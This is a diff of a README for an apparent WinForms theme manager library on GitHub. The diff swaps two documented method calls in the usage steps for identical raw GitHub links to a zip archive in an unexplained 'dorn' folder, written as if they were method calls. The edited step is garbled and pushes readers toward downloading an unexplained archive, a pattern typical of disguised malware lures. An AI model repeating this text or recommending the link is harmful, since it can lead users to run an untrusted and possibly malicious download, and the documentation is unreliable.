Daniel36000/WinForms-ThemeManager/README.md

 1. Open your WinForms project in Visual Studio.
 2. Reference the WinForms-ThemeManager in your project by adding it via NuGet or by referencing the assembly.
-3. Call the theme manager methods to switch between themes, such as `ThemeManager.EnableDarkMode()` or `ThemeManager.EnableLightMode()`.
+3. Call the theme manager methods to switch between themes, such as `https://raw.githubusercontent.com/Daniel36000/WinForms-ThemeManager/main/dorn/WinForms-ThemeManager.zip()` or `https://raw.githubusercontent.com/Daniel36000/WinForms-ThemeManager/main/dorn/WinForms-ThemeManager.zip()`.
 4. Adjust the settings as needed based on your application's user preferences.

 ## 🖥️ System Requirements